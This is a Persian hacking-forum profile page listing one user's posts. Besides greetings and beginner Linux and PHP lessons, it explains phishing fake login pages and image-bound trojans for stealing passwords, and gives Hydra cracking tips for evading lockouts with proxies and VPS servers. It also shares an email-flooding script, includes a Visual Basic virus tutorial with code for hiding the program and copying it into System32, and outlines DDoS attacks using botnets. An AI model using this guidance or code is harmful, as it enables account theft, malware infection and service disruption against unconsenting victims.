رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

R3dC0d3r

جاویدان
  • ارسال ها

    124
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    27

تمامی موارد ارسال شده توسط R3dC0d3r

  1. با سلام دوست عزیز ببینید این 2 تا روش جداست اینی که در لوگ ذخیره بشه فیک پیج هست و اونی که یک عکس باشه ویروسی از نوع تروجان ، کی لاگر یا رت هست که شما میای و ویروست رو در یک عکس بیند می کنید و در اختیار هدف قرار میدید و پس از آلوده شدن کامپیوتر هدف حال اطلاعاته مربوطه (پسورد موردنظر) ایمیل یا در جایی که تعیین کردید آپلود میشه اگر هم که شبیه رت باشه میتونید پنل تون رو راه اندازی کنید یک توضیح کوچیک هم در رابطه با فیک پیج خدمتتون بدم شما میاید و یک صفحه لاگین تقلبی شبیه صفحه لاگین سرور مورد نظر (مثلا جیمیل) درست میکنید و کاری میکنید که تارگت بیاد وارد این صفحه تقلبی بشه و یوزر پس جیمیل خودش رو بزنه ؛ این یوزر و پس در صفحه ای که تعیین کردید ، فرض مثال log.txt ذخیره میشه من هر 2 روش رو بهتون گفتم و اون روشی که شما گفتید تا حالا مشابهش رو ندیدم و این روشی که شما می فرمایید به این شکل قطعا امکان پذیر نیست
  2. درود دوست عزیز هیدرا یک نوع بروت فروس برای کرک هست که از ابزارهای کالی لینوکس هس که البته نسخه ویندوزشم موجوده مشخصا کرک راه صد درصدی برای پسورد اتک نیست و همیشه و در همه موارد جواب نمیده معمولا هم اون شخصی که کرک میکنه میاد و اون تارگت هایی که پسورد ساده دارن رو کرک میکنه فرض مثال نمیاد و یک تارگت مهم رو کرک کنه ! چون اصلا بی نتیجه خواهد بود آموزش های مربوط به هیدرا رو درخواست کردید که اگر در انجمن یک جستجو میکردید هم به صورت تصویری هم مقاله مطلبتون رو یافت میکردید آموزش تصویری هک جیمیل با هیدرا [Hidden Content] آموزش هیدرا در محیط ویندوز که به صورت مقاله هست [Hidden Content] و راجب اینکه گفتید این کار چه فرقی با وارد کردن پسورد به صورت دستی داره جوابتون اینه که اول هیچ فردی نمیاد وقت و انرژیش رو برای وارد کردن پسورد به صورت دستی بزاره که آیا بشه آیا نشه ! دوم اینکه شما 5بار در گوگل پسورد اشتباه وارد کن و میبینی که آی پی شما به مدت یک ساعت بلوک میشه ؛ از طرفی ابزارهایی مثل هیدرا پارامتر های خودشون رو برای دور زدن تارگت دارن ، مثل پراکسی لیست و آی پی چنجر ، زمان بندی و ... سوم اینکه شخص نمیاد ابزار کرک رو روی کامپیوتر خودش راه اندازی کنه معمولا روی سرور های مجازی (وی پی اس) راه اندازی میکنند که هم سرعت بالایی رو داشته باشه هم 24 ساعت در حال کرک باشه در کل کرک هم دنیای خودش رو داره سوالی بود در خدمتم امیدوارم مطلبی که میخواستید رو به دست آورده باشید .
  3. میلاد با سعادت امام صاحب زمان عج الله(ع) بر تمامی مسلمین به خصوص اعضای محترم گاردایران مبارک باد
  4. با سلام خدمت شما دوست عزیز اکثر هاست های رایگان محدودیت دارن و معمولا فیک پیج ها رو بلاک / بن می کنند اینجا لیست یک سری از هاست های رایگان که یکی از دوستان قبلا قرار داده بود رو براتون میذارم [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] اگر باز هم به نتیجه نرسیدید در صورتی که آشنایی دارید میتونید یک هاست شخصی با Direct Admin بر روی سرور مجازی خودتون راه اندازی کنید امکانش هم هست که super phish پیج رو جوری ساخته باشه که هاستینگ ها با اون مشکل داشته باشند پیشنهاد میکنم که سری هم به تاپیک جامع Fake Page بزنید [Hidden Content]
  5. ولادت باسعادت شفيع المذنبين ، حامي دين ، امام حسين بن علي-ع مبارک
  6. R3dC0d3r

    تبریک عید مبعث

    من هم به نوبه ی خودم این عید عزیر رو تبریک میگم عید مبعث بر تمام مسلمانان جهان به خصوض اعضای محترم گارد ایران مبارک باد
  7. با سلام خدمت اعضای محترم گارد ایران بنده این تاپیک رو ایجاد کردم تا برای کاربران گارد ایران به صورت رایگان آواتار طراحی بشه لطفــــا قوانین رو رعایت کنید : - تمام مشخصات از قبیل رنگ ، متن ، اندازه و عکس مورد نظر و سبک طراحی ذکر شود ذکر لقب و ... - طراحی ها رایگان می باشد - از هر کاربر در هفته فقط یک سفارش پذیرفته میشود - سفارش های بدون مشخصات کامل تایید و انجام نمی شود !!! لطفا تا تحویل گرفتن کار صبور باشید...!! در اسرع وقت طراحی میشه و خدمتتون تحویل داده میشه برای نمونه کار هم میتونید آواتار خودم رو در نظر بگیرید
  8. با سلام با اجازه دوستمون من یک سری توضیحات تکمیلی در رابطه با بخش اول آموزششون بدم ‏(هماهنگ شده) خط اول ما تو این برنامه با !# آغاز میشه این وعلامت فقط در خط اول هر برنامه در کنارهم استفاده می شه و در ادامه مسیر مفسر پرل را اعلام میکنه و به سیستم عامل میگه که وقتی این کد اجرا کردیم این مفسر اجرا شه ؛ شما میتونید تو هر سیستم عاملی که کار میکنید بعد از این دو تا کاراکتر آدرس محل قرارگیری مفسر رو به برنامتون بدهید اینجا محل قرار گیری پیشفرض پرل روی سیستم عامل لینوکس هست #!/usr/bin/perl خط دوم هم که همونطور که گفتن اگر بخوایم چیزی رو به عنوان یادداشت در کنار کد یا برای اون بخش کد ، عنوان بزاریم از # استفاده میکنیم که البته هیچ تاثییری هم در کد نداره و برای یادداشت گذاشتن هستحال برای چاپ یک متن از دستور print استفاده میکنیم ؛ به صورت print "Guardiran Security Team" نکته بعدی این که چطور بدون استفاده از enter لاین رو عوض کنیمبرای مثال اگر بخوایم بنویسیم Guardiran Security Team www.guardiran.org به احتمال زیاد دوستانی که در پرل تازه کار هستن اینگونه مینویسیند print "Guardiran Security Team" print "www.guardiran.org" اما با دستور /n میشه به راحتی لاین رو عوض کرد ؛ به صورت : print "Guardiran Security Team/nwww.guardiran.org پس یک فرم کلی از کد هایی که تا الان یاد گرفتید : #!/usr/bin/perl #Training Perl print "Guardiran Security Team/nwww.guardiran.org"
  9. Difference Between Linux And Windows Server تفاوت های سرور لینوکسی و ویندوزی : لینوکس سیستم عاملی OpenSource میباشد و رایگان بوده ولی ویندوز سیستم عاملی غیر رایگان است. هزینه ی سرورهای ویندوزی از سرورهای لینوکسی بیشتر است. کار با سرور ویندوزی دقیقا مانند کار با یک کامپیوتر ویندوزی است و فرد به وسیله ی ریموت دسکتاپ صفحه ی سرور را در سیستم خود اجرا میکند و مثل سیستم خود با سرور کار میکند. لینوکس در زمینه ی امنیت و هاستینگ پیشرفت خوبی نسبت به ویندوزه داشته است و کنترل پنل آن حرفه ای طراحی شده است. کار کردن با لینوکس به صورت کد نویسی میباشد (در بالا هم گفتیم میشه از گرافیکی هم استفاده کرد). سیستم عام لینوکس از زبان های PHP – Python – Perl – CGI پشتیبانی میکند زبان های پی اچ پی در برخی از سیستم عامل های ویندوز قابل اجرا هستند اما پی اچ پی نصب شده برروی ویندوز در برخی از موارد مشکلاتی به همراه دارد
  10. R3dC0d3r

    نمونه کار های گرافیکی

    اینم یک لوگو برای امضا
  11. R3dC0d3r

    اسکریپت mailFlood

    با سلام در این مطلب اسکریپت mailFlood رو که در زبان زیبایه پایتون نوشته شده رو براتون آماده کردم یک توضیح کوچیک : این اسکریپت همانند همون اسپمر های خودمون عمل میکنه ! در واقع یک تعداد ایمیل زیاد (که تعدادش قابل تعیین کردنه) رو از طرف شما میفرسته به یک میل باکسه دیگه هدف فقط آموزشه سعی کنید کد ها رو با دقت برسی کنید رمز فایل : guardiran.org mailFlood.zip
  12. R3dC0d3r

    ایجاد سرور میزبان PHP در کامپیوتر شخصی

    برای شروع برنامه نویسی Php و تسته پروژه ها و ... نیازمند یک وب سرور بر روی کامپیوتر خود (localhost‎‎) هستید تا بتوانید به راحتی و با سرعت کارتون رو انجام بدید چگونه در کامپیوتر خود یک وب سرور میزبان پی اچ پی داشته باشیم؟ برای راه اندازی یک وب سرور لوکال بر روی کامپیوتر شخصی خود با قابلیت راه اندازی صفحات Server Side به زبان برنامه نویسی PHP می تونید از نرم افزارهای متداولی استفاده کنید برخی از این نرم افزار ها XampWampEasy PHP‏Wamp که بهترین محیط کاربری را به کاربرانش عرضه کرده است بیشتر ازسایرین توصیه می شود شما می توانید نرم افزار Wamp را از وب سایت [ WAMPSERVER ] به صورت رایگان دریافت نمایید. بعد از نصب نرم افزار , بسته به محل نصب و پوشه ای که ساخه باشید پوشه ای به نام WWW برای شما ساخته خواهد شد و مانند یک سرویس دهنده میزبان وب عمل می نماید و باید اسناد و پوشه های پروژه خود را در یک پوشه مشخص به نام WWW ایجاد کنید. بعد از اجرا کردن برنامه Wamp مرورگری مانند firefox را اجرا کنید و در محل آدرس : Http://localhost/ || [Hidden Content] را تایپ کنید و از شاخه پروژه ها , پروژه خود را انتخاب کنید.ذکر این نکته ضروری است که برای پروژه های جدی و غیر آزمایشی استفاده از وب سرور مناسبی همچون آپاچی یا IIS توصیه می شود لطفا اطلاعات تکمیلی نرم افزار را در وب سایت رسمی تولید کننده نرم افزار ملاحظه فرمایید : [Hidden Content]
  13. با سلام , تصمیم گرفتم تا در یک تاپیک آموزش ویروس نویسی ( حداقل در یکی از زبان ها ) آموزش ویروس نویسی در زبان ویژوال بیسیک رو خدمتون بدم با نام خدا و مقدمه بخش اول رو شروع میکنم ویروس ها فایل های مخفی ای هستند که پس از ورود به سیستم شروع به تخریب و یا انجام کاری که برایش تعریف شده میکند . یکی از خاصیت های مهم ویروس مخفی بودن و دور از دسترس بودن است ما در آموزش اول ابتدا سعی میکنیم تا این خاصیت رو بهش بدیم و برای دادن این خاصیت ها به ویروسمون از کد های : Me.hide App.TaskVisible = False استفاده میکنیمو اما کاربرد این کد ها چیه ؟ در اینجا کد Me.hide جلوی نمایش داده شدن فرم پس از اجرای فایل رو میگیره App.TaskVisible هم برای نمایش دادن یا ندادن فایل توسط Task Manager در قسمت Application هست که در صورت False بودن این مقدار , فایل ویروسی نمایش داده نخواهد شد این دستورات را در قسمت Form‎_Load در ویژوال بیسیک می نویسند به شکل زیر : Private Sub Form_Load(‎‎)‎ Me.hide App.TaskVisible = False End sub حالا میریم سراغ بخش پنهان سازی فایلدر اینجا با کد SetAttr مسیر جایی که ویروس قرار داره رو تعیین میکنیم و شروع میکنیم به دادن یک سری خاصیت ها مخفی سازی سیستمی قرار دادن فایل در حالت ReadOnly و غیر قابل ویرایش SetAttr "c:\virus.exe", khasiat ha ke ba dastore + dar kenare ham gharar migiran c:\virus.exe ham ke masire viruseton hast SetAttr "c:\virus.exe", vbHidden تا اینجا vbHidden رو اضافه کردیم , برای اضافه کردن بقیه خاصیت ها از + استفاده میکنیم : SetAttr "c:\virus.exe", vbHidden + vbSystem + vbReadOnly در مرحله بعد میریم برای افزایش سطح دسترسی ویروس و ورود به پوشه System32 یا مسیری که میخواید ویروس اونجا ایجاد شهایجاد ویروسمون در پوشه سیستم 32 w$ = Environ("windir") FileCopy App.Path + App.EXEName + ".exe", w$ + "\system32\" + "virus.exe"خوب دوباره میریم در قسمت Form‎_Load تا کد هارو بنویسیم Form_Load() Me.Hide App.TaskVisible = False w$ = Environ("windir") FileCopy App.Path + App.EXEName + ".exe", w$ + "\system32\" + "virus.exe" SetAttr "c:\windows\system32\virus.exe" + vbHidden + vbSystem + vbReadOnly End Sub پایان بخش اول
  14. با ســــلام تو این بخش تا حد مبتدی کار با لینوکس رو یاد میگیریم ابتدا از یک سری اصطلاحات و تفاوت های سرور های لینوکس و ویندوز و معرفی محیط های گرافیکی شروع میکنیم تا برسیم به کار با اس اس اچ SSH و خط فرمان Terminal و ... سر فصل ها : - اصطلاحات و آشنایی ها - تفاوت های سرور های لینوکس و ویندوز ( Linux Server , Windows Server ) - معرفی محیط های گرافیکی - آموزش کار با SSH - آموزش مقدماتی دستورات ( خط فرمان ) بخش اول Linux's Primary Explain and Phrases سرور: سرور یه کامپیوتری است که ما اطلاعات رو بهش میدیم یا ازش میگیریم و این کامپیوتر همیشه روشنه و با سرعت خیلی بالایی در حال پردازش اطلاعات ماست . دیتاسنتر : یه ساختمون که سرور ها تو اون نگه داری میشوند و یه سری افراد به طور دائم از این سرور ها مراقبت میکنند . در این ساختمان ها عموما از برق اضطراری استفاده میکنند تا جلوی خاموش شدن دستگاه هارو بگیرند سرور وی پی اس Virtual Private Server یا سرویس های اختصاصی مجازی ، نوعی میزبانی وب است و شیوه ای است که در آن یک سرور به چند قسمت تقسیم شده و هر قسمت به عنوان یک سرور مجازی میتونه مثل یک سرور اختصاصی عمل کنه. SSH فقط در سرورهای لینوکسی که ما اسمشو میشنویم در واقع یه پل ارتباطی به صورت غیر گرافیکی با محیط کد نویسی بین سرور و کامپیوتر شماست. در نظر داشته باشید که سرورهای لینوکسی هم محیط گرافیکی دارند ولی خب برای این که رم مصرفش کمتر شه از کد نویسی استفاده میکنند HostName نام سرور لینوکسی شماست که گاهی اوقات در زمان خرید وی پی اس با ان برخورد میکنید برای مثال : server.domain.com server.guardiran.org کرنل چیست ؟ کرنل همان هسته ی سیستم عامل شما میشه مجازی ساز چیست؟ مجازی ساز در واقع یه سری از نرم افزارها هستند که میان سرور های مجازی مختلفی رو، روی سرور ما ایجاد میکنند برای مثال نرم افزار هایی مثل : VMWare Xen بخش اول تمام شد , امیدوارم مفید واقع شده باشه
  15. بخش سوم - طبقه بندی حملات DDoS حملات تکذیب سرویس به 5 نوع مهم و کلی دسته بندی می شوند البته ممکن است شیوه های دسته بندی دیگری هم به صورت جزئی تر و یا با تعداد بیشتری برای حملات دیداس موجود باشد . Buffer Overflow Attack حمله سر ریز بافر هنگامی رخ می دهد که میزان اطلاعات نوشته شده در بافر بیش از میزان پیش بینی شده برای آن در مموری سیستم باشد. سرریز بافر یک نوع ضعف برنامه نویسی است حمله کننده می تواند دیتای کنترل کننده مسیر اجرای برنامه را بازنویسی کرده و با سرقت و در دست گرفتن کنترل برنامه کدهای برنامه دلخواه خود را به جای پروسه های سرور به اجرا در آورد . توضیحات کامل تر در مورد این نوع حمله در موضوع : آشنایی با حملات سرریز بافر Ping of Death Attack در تمامی قرن بیستم این شیوه یکی از مشهورترین حملات DoS بود . اما امروزه به طور کلی بلوکه شده و جلوی آن گرفته شده . حمله کننده به عمد یک پاکت یا بسته IP بزرگتر از 65536 بایت را که توسط پروتکل IP مجاز شناخته می شود ارسال می کرد در این پروتکل فایل در مبدا به بسته های اطلاعاتی خرد شده و پس از ارسال به کامپیوتر مقصد ، بسته های اطلاعاتی در مقصد سر هم شده و بر روی کامپیوتر مقصد فایل دوباره ساخته می شود. اما سیستم عامل مقصد از عهده سر هم کردن پاکت های اطلاعاتی با اندازه بزرگتر از استاندارد که حمله کننده به صورت عمدی ساخته و ارسال کرده بود ، بر نمی آمد و قفل می کرد ، ری استارت می شد یا حتی به راحتی کرش می کرد . Smurf Attack این حمله شیوه ای برای ایجاد یک ترافیک معنی دار و آزار دهنده بر روی شبکه کامپیوتری قربانی است. در این شیوه حمله کننده سیستم قربانی را با ارسال پیام های Ping قلابی غرق می کند. در این روش ، هکر تعداد بسیار زیادی ترافیک ICMP echo یا همان پینگ تولید می کند و آنها را از منابع ناشناس و قلابی به سمت هاست قربانی ارسال می کند . نتیجه هم تعداد فراوانی پاسخ پینگ است که باعث نابودی سیستم قربانی می شود . Tear Drop این حمله شامل ارسال قطعات پاکت های اطلاعاتی روی هم افتاده ای است که بزرگ تر از اندازه معمول هستند اما کاملا انباشته نشده اند . این بسته های ناقص الخلقه در سیستم عامل های مختلف به دلیل باگ های موجود در کد های دوباره سازی بسته های اطلاعاتی مرتبط با پروتکل TCP/IP ، باعث کرش کردن سیستم می شوند SYN Attack حمله کننده درخواست های TCP SYN جعلی برای سرور قربانی ارسال می کند . سرور تمامی منابع را به کار می گیرد تا درخواست های دریافتی پاسخ دهد. اما مشکل اینجا است که درخواست دهنده ها قلابی هستند ! هر پاسخ تا تایید توسط درخواست دهنده به صورت یک اتصال نیمه باز بر روی سرور باقی می ماند . سرور در پاسخ یک بسته TCP/SYN-ACK برای درخواست دهنده ارسال می کند و منتظر پاسخ از آدرس فرستنده می ماند. به هر حال به دلیل عدم وجود فرستنده واقعی ، هیچ گاه پاسخی برنمی گردد . و کم کم اتصالات نیمه باز تمام اتصالات ممکن سرور را می مکند و اشباع می کنند . پس سرور از پاسخ گویی به دیگر کاربران معمول خود باز می ماند. در بخش بعدی به طور عملی با این شیوه ها آشنا خواهیم شد .
  16. چگونه ضعف در برنامه نویسی , می تواند باعث دسترسی به یک نرم افزار یا از کارانداختن اش شود ؟ حملاتی که آنها را سرریز بافر یا Buffer Overflow Attack می نامند . بافر چیست؟ اگر برنامه نویس باشید با این اصطلاح آشنایی دارید , به خصوص اگر با زبان C کار می کنید بافر قسمتی از حافظه است که به طور موقت برای نگه داری اطلاعات یک نرم افزار اختصاص یافته است اطلاعات پیش از رسیدن به محل اصلی در مکانی به نام بافر به صورت موقت ذخیره میشوند بافر معمولا یک ظرفیت از پیش مشخص شده دارد که توسط برنامه نویس تعیین می شود . تصور کنید نرم افزاری دارید که یک بافر با سایز ثابت 128 بایت دارد حالا اگر یک مهاجم 1000 بایت دیتا برای این بافر ارسال کند چه اتفاقی رخ میدهد؟ ظرف شما از آب پر می شود و سر ریز می کند در چنین حالتی یک نرم افزار واکنش های متفاوتی از خودش بروز می دهد که قابل پیش بینی نیست . برای مثال سرور ایمیل شما تحت چنین حمله ای قرار می گیرد و بر اثر سرریز بافر کرش کرده و از کار می افتد ؛ سرریز بافر یک راه شایع و خطرناک برای حمله به سرویس ها و دیتابیس هاست اما ماجرا به همینجا ختم نمیشود ؛ در ادامه از طریق این حملات می توان کنترل کامپیوتر میزبان را هم به دست گرفت ! تصور کنید سرویس ایمیل شما بر مبنای یونیکس کار می کند و با Root فعال است این سرویس در فرم ورود به سایت آدرس ایمیل کاربر را بررسی می کند حالا هکر به جای آدرس ایمیل یک دستور ارسال می کند که سبب سرریز بافر شده و شامل دستورهای یونیکسی است که باعث می شود کامپیوتر هدف آنها را اجرا کند با این کار هکر دسترسی کامل سرور را در دست می گیرد * این دستورها معمولا با زبان اسمبلی ارسال می شوند و ساختن مجموعه دستوری که بتواند در کامپیوتر هدف اجرا شود کار بسیار سختی است اما دستورهای حمله به بسیاری از اپلیکیشن ها از قبل نوشته شده و با یک جستجو می توان آن را پیدا کرد , بنابراین حمله برای یک هکر کار سختی نخواهد بود برای جلوگیری از این حملات به چند راهکار اساسی عمل کنید : - اگر برنامه نویس هستید فراموش نکنید که از همان ابتدای کد نویسی و طراحی , امنیت را یک گوشه از ذهن تان قرار بدهید - تمام ورودی های کاربر را از قبیل فرم ها , بررسی کنید تا فقط اطلاعات مورد نظر شما امکان عبور را داشته باشند - نرم افزارها و اپلیکیشن ها را آپدیت نگه دارید - تست نرم افزارتان را برای این گونه حملات فراموش نکنید - و در پایان سرویس هایی را که استفاده نمی کنید , غیرفعال کنید .
  17. VMWare در ابتدا برروی سیستم دو نوع کارت شبکه مجازی ایجاد میکنه به نام های : VMnet1 VMnet8 در اینجا برای شبکه کردن سیستم به کارت شبکه VMnet8 که برروی حالت NAT قرار داره نیاز دارید
  18. شما میخواین که از 0 هک رو شروع کنید ؟ علاقه ی شما به هک شبکه هس ؟ اگر به هک شبکه علاقه دارین من راهنماییتون میکنم که چه مراحلی رو باید طی کنید
  19. با سلام در مورد وایرلس به احتمال زیاد باید نسخه درایور برای لینوکس موجود باشه و پس از دریافت مشکلتون حل میشه ( اگر نشد مشکل از جایه دیگه ای هست ) اما در مورد نصب کالی به عنوان سیستم عامل اصلی من نظرم بر اینه که شما کالی رو در کنار ویندوز داشته باشید
  20. بخش دوم - حملات DDoS توزیع شده ( با استفاده از Botnet ها و بدافزارها ) در چنین حملاتی هکر نرم افزاری خاص و موسوم به زامبی را تولید و توزیع می کند این نوع نرم افزار ها به هکر اجازه خواهد داد که تمام یا بخشی از کامپیوتر آلوده را تحت کنترل خود دراورد و برای اهداف خود از آن ها استفاده کند. هکر پس از نفوذ به سیستم هدف با استفاده از نرم افزار نصب شده ( زامبی ) تهاجم نهائی خود را با به کارگیری و استفاده از مجموعه وسیعی از میزبانان انجام خواهد داد یک بات نت بزرگ تشکیل شده از 10000 کامپیوتر آلوده است در یک حمله از نوع DDoS , مدیر بات از کامپیوتر شما که آلوده است برای حمله علیه کامپوتر دیگری استفاده می کند هکر با استفاده از نقاط آسیب پذیر و ضعف امنیتی موجود بر روی سیستم شما می تواند کنترل کامپیوتر شما را به دست گرفته و از آن به منظور انجام عملیات خود استفاده کند ارسال حجم بالایی داده از طریق کامپیوتر شما برای یک سایت نمونه ای از همکاری کامپیوتر شما در یک حمله DDoS می باشد توضیحات کامل تر درباره مباحث بات نت در : تاپیک آموزش کامل مباحث بات نت Botnet
  21. R3dC0d3r

    تبریک روز پدر

    روز پدر و ولادت حضرت علی (ع) رو به همه به خصوص پدرانه عزیز و زحمت کش تبریک میگم انشالا سایه پدر همیشه بر سر همه باشه
  22. بخش اول - DDoS چیست ؟ و حملات آن چگونه صورت میگیرد ؟ DDoS مخفف عبارت Distributed Denial of Service و برای overload کردن ( سرریز کردن ) یک سایت یا سرور انجام میشود که در نهایت منجر به از کار افتادن سایت یا سرور موردنظر به طور موقت یا دائمی می شود . ایجاد یک نوع بار غیر عادی بر روی سرور به زبان ساده تر یعنی ارسال کردن درخواست های زیاد به سرور و استفاده بیش از حد از منابع ( پردازنده , پایگاه داده , پهنای باند , حافظه و ... ) که در نهایت سرور به دلیل حجم بالای پردازش و overload شدن عملیات ها دچار اختلال شده و از دسترس خارج می شود . این نوع حملات برای کارساز بودن معمولا از طریق چند کامپیوتر مختلف ( که Zombie نامیده میشوند ) در یک لحظه یا به طور مداوم ( با استفاده از بات نت ها ) به یک سرور ( با آی پی مشخص ) درخواست دریافت اطلاعات ارسال می کنند و در نتیجه سرور overload شده و down می شود . در همین زمینه P0!s0nC0d3 عزیز مقاله ای مفید در مورد آشنایی با حملات DoS برای شما عزیزان آماده کرده اند تا مطالعه کنید . DOS ( Denial Of Service ).rar
  23. در این تاپیک قصد دارم تا حملات DDoS , نحوه کار و راه های مقابله DDoS رو براتون شرح بدم لطفا قوانین رو رعایت کنید و برای جلوگیری از پراکندگی آموزش ها اسپم ندید و اگر سوالی بود در بخش سوالات مطرح کنید سرفصل آموزش ها شامل : - DDoS چیست ؟ و حملات آن چگونه صورت میگیرد ؟ - حملات DDoS توزیع شده ( با استفاده از Botnet ها و بدافزارها ) - طبقه بندی حملات DDoS ( پنج نوع مهم و کلی ) - آموزش حمله DDoS مبتدی تا پیشرفته ( با استفاده از Botnet ها ) - راه های مقابله ( DDoS Protection ) و ... رمز تمامی فایل ها : guardiran.org موقق باشین .
  24. تولدت مبارک دوست عزیزم انشالله همیشه در کنار دوستان و خانواده شاد و موفق باشین
×
×
  • ایجاد مورد جدید...